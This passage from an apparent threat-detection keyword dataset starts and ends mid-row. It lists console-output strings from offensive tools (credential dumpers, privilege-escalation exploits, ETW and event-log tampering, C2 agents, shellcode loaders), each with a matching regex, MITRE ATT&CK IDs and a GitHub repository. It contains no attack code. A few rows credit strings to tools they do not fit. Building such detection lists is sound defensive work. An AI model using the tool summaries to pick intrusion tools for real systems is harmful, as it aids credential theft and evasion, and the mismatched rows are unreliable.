T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","N/A","7","3","215","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z" "*[+] Connected to \\\\*\\IPC$*",".{0,1000}\[\+\]\sConnected\sto\s\\\\\\\\.{0,1000}\\\\IPC\$.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","1","#contentstrings","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*[+] Connnecting to all computers and try to get dpapi blobs and master key files*",".{0,1000}\[\+\]\sConnnecting\sto\sall\scomputers\sand\stry\sto\sget\sdpapi\sblobs\sand\smaster\skey\sfiles.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","10","5","444","48","2024-05-01T06:31:37Z","2022-09-09T15:07:15Z" "*[+] Copying a Shellcode To Target Memory*",".{0,1000}\[\+\]\sCopying\sa\sShellcode\sTo\sTarget\sMemory.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*[+] Could not find TeamFiltration config*",".{0,1000}\[\+\]\sCould\snot\sfind\sTeamFiltration\sconfig.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*[+] Create evil class for file transfer*",".{0,1000}\[\+\]\sCreate\sevil\sclass\sfor\sfile\stransfer.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*[+] Created Elevated HKLM:*",".{0,1000}\[\+\]\sCreated\sElevated\sHKLM\:.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*[+] Creating mock directories*",".{0,1000}\[\+\]\sCreating\smock\sdirectories.{0,1000}","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*[+] Creating Service on Remote Target?*",".{0,1000}\[\+\]\sCreating\sService\son\sRemote\sTarget\?.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*[+] delete single event log succ*",".{0,1000}\[\+\]\sdelete\ssingle\sevent\slog\ssucc.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*[+] Deobfuscated dump saved in file decrypted.dmp*",".{0,1000}\[\+\]\sDeobfuscated\sdump\ssaved\sin\sfile\sdecrypted\.dmp.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","5","468","55","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "*[+] Direct syscalls have been disabled, getting API funcs from ntdll in memory!*",".{0,1000}\[\+\]\sDirect\ssyscalls\shave\sbeen\sdisabled,\sgetting\sAPI\sfuncs\sfrom\sntdll\sin\smemory!.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*[+] Direct syscalls have been disabled, getting API funcs from ntdll in memory!*",".{0,1000}\[\+\]\sDirect\ssyscalls\shave\sbeen\sdisabled,\sgetting\sAPI\sfuncs\sfrom\sntdll\sin\smemory!.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","print output","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*[+] DLL dropped!*",".{0,1000}\[\+\]\sDLL\sdropped!.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","N/A","7","3","215","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z" "*[+] Domain Password Spray *",".{0,1000}\[\+\]\sDomain\sPassword\sSpray\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*[+] Downloading Fat Linpeas binaries*",".{0,1000}\[\+\]\sDownloading\sFat\sLinpeas\sbinaries.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*[+] DpapiDump Loaded*",".{0,1000}\[\+\]\sDpapiDump\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*[+] Dropping into shell*",".{0,1000}\[\+\]\sDropping\sinto\sshell.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*[+] Elevated to SYSTEM privileges*",".{0,1000}\[\+\]\sElevated\sto\sSYSTEM\sprivileges.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","9","2","166","47","2022-09-02T08:43:14Z","2018-07-14T18:48:51Z" "*[+] Encoding with base64 and reverse it to avoid detections*",".{0,1000}\[\+\]\sEncoding\swith\sbase64\sand\sreverse\sit\sto\savoid\sdetections.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*[+] Encrypting The Stack.... *",".{0,1000}\[\+\]\sEncrypting\sThe\sStack\.\.\.\.\s.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*[+] Enumerating driver services...*",".{0,1000}\[\+\]\sEnumerating\sdriver\sservices\.\.\..{0,1000}","offensive_tool_keyword","DriverQuery","Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft","T1124 - T1057 - T1082","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*[+] ETW Patched* No Logs No Crime !*",".{0,1000}\[\+\]\sETW\sPatched.{0,1000}\sNo\sLogs\sNo\sCrime\s!.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","81","12","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*[+] Event Logger is Either NOT running or Already Killed Previously!*",".{0,1000}\[\+\]\sEvent\sLogger\sis\sEither\sNOT\srunning\sor\sAlready\sKilled\sPreviously!.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" "*[+] Execute shellcode... press enter*",".{0,1000}\[\+\]\sExecute\sshellcode\.\.\.\spress\senter.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","10","10","943","148","2024-01-30T23:37:09Z","2022-02-20T01:23:35Z" "*[+] Exploit completed. Got a SYSTEM token! :)*",".{0,1000}\[\+\]\sExploit\scompleted\.\sGot\sa\sSYSTEM\stoken!\s\:\).{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","#contentstrings","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*[+] Exploit successful! *",".{0,1000}\[\+\]\sExploit\ssuccessful!\s.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*[+] Exploit worked* it should execute your command as SYSTEM!*",".{0,1000}\[\+\]\sExploit\sworked.{0,1000}\sit\sshould\sexecute\syour\scommand\sas\sSYSTEM!.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "*[+] Extracting LAPS password from LDAP*",".{0,1000}\[\+\]\sExtracting\sLAPS\spassword\sfrom\sLDAP.{0,1000}","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","0","N/A","10","4","363","71","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z" "*[+] Finding directory to hijack*",".{0,1000}\[\+\]\sFinding\sdirectory\sto\shijack.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*[+] Finished Enumerating Shares*",".{0,1000}\[\+\]\sFinished\sEnumerating\sShares.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","N/A","9","1","29","6","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z" "*[+] Generated XOR key: *",".{0,1000}\[\+\]\sGenerated\sXOR\skey\:\s.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","6","573","100","2024-04-30T14:35:29Z","2023-08-08T11:30:34Z" "*[+] Generating base64 encoded PowerShell script*",".{0,1000}\[\+\]\sGenerating\sbase64\sencoded\sPowerShell\sscript.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","184","39","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*[+] GetPEFromRemoteServer*",".{0,1000}\[\+\]\sGetPEFromRemoteServer.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","10","8","796","162","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" "*[+] Getting credentials using U2U*",".{0,1000}\[\+\]\sGetting\scredentials\susing\sU2U.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*[+] Got Krb Auth from NT/System. Relaying to ADCS now*",".{0,1000}\[\+\]\sGot\sKrb\sAuth\sfrom\sNT\/System\.\sRelaying\sto\sADCS\snow.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*[+] Got Krb Auth from NT/SYSTEM. Relying to LDAP now*",".{0,1000}\[\+\]\sGot\sKrb\sAuth\sfrom\sNT\/SYSTEM\.\sRelying\sto\sLDAP\snow.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*[+] Got NTLM type 3 AUTH message from * with hostname *",".{0,1000}\[\+\]\sGot\sNTLM\stype\s3\sAUTH\smessage\sfrom\s.{0,1000}\s\swith\shostname\s.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","N/A","10","2","176","23","2024-02-28T22:37:14Z","2024-02-26T12:08:34Z" "*[+] hacked the exterior layer of the datacenter mainframe*",".{0,1000}\[\+\]\shacked\sthe\sexterior\slayer\sof\sthe\sdatacenter\smainframe.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*[+] Hello from DllMain-PROCESS_ATTACH in Merlin*",".{0,1000}\[\+\]\sHello\sfrom\sDllMain\-PROCESS_ATTACH\sin\sMerlin.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*[+] Hijackable DLL: *",".{0,1000}\[\+\]\sHijackable\sDLL\:\s.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*[+] HiveDump Loaded*",".{0,1000}\[\+\]\sHiveDump\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*[+] HTTP Client Auth Context swapped with SYSTEM *",".{0,1000}\[\+\]\sHTTP\sClient\sAuth\sContext\sswapped\swith\sSYSTEM\s.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*[+] HTTP reflected DCOM authentication succeeded!*",".{0,1000}\[\+\]\sHTTP\sreflected\sDCOM\sauthentication\ssucceeded!.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*[+] ICMP listener started!*",".{0,1000}\[\+\]\sICMP\slistener\sstarted!.{0,1000}","offensive_tool_keyword","PingRAT","secretly passes Command and Control (C2) traffic through firewalls using ICMP payloads","T1071.004 - T1573.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/umutcamliyurt/PingRAT","1","0","N/A","10","10","82","12","2023-09-29T22:26:15Z","2023-09-29T22:07:46Z" "*[+] ICYGUIDER'S CUSTOM SYSCALL SHELLCODE LOADER*",".{0,1000}\[\+\]\sICYGUIDER\'S\sCUSTOM\sSYSCALL\sSHELLCODE\sLOADER.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","N/A","9","10","1048","172","2024-04-26T14:24:52Z","2021-09-28T16:52:24Z" "*[+] Impersonating user * to target SPN *",".{0,1000}\[\+\]\sImpersonating\suser\s.{0,1000}\sto\starget\sSPN\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*[+] Injected the * DLL into process *",".{0,1000}\[\+\]\sInjected\sthe\s.{0,1000}\sDLL\sinto\sprocess\s.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*[+] Injecting dropper.vba into *",".{0,1000}\[\+\]\sInjecting\sdropper\.vba\sinto\s.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*[+] Injecting into existing process*",".{0,1000}\[\+\]\sInjecting\sinto\sexisting\sprocess.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*[+] Injecting into existing process*",".{0,1000}\[\+\]\sInjecting\sinto\sexisting\sprocess.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","N/A","9","10","1048","172","2024-04-26T14:24:52Z","2021-09-28T16:52:24Z" "*[+] Injecting into existing process*",".{0,1000}\[\+\]\sInjecting\sinto\sexisting\sprocess.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","print output","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*[+] Invoking EfsRpcAddUsersToFile with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcAddUsersToFile\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*[+] Invoking EfsRpcAddUsersToFileEx with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcAddUsersToFileEx\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*[+] Invoking EfsRpcDecryptFileSrv with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcDecryptFileSrv\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*[+] Invoking EfsRpcDuplicateEncryptionInfoFile with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcDuplicateEncryptionInfoFile\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*[+] Invoking EfsRpcDuplicateEncryptionInfoFile with target path:*",".{0,1000}\[\+\]\sInvoking\sEfsRpcDuplicateEncryptionInfoFile\swith\starget\spath\:.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*[+] Invoking EfsRpcEncryptFileSrv with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcEncryptFileSrv\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*[+] Invoking EfsRpcFileKeyInfo with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcFileKeyInfo\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*[+] Invoking EfsRpcFileKeyInfoEx with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcFileKeyInfoEx\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*[+] Invoking EfsRpcGetEncryptedFileMetadata with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcGetEncryptedFileMetadata\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*[+] Invoking EfsRpcOpenFileRaw with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcOpenFileRaw\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via 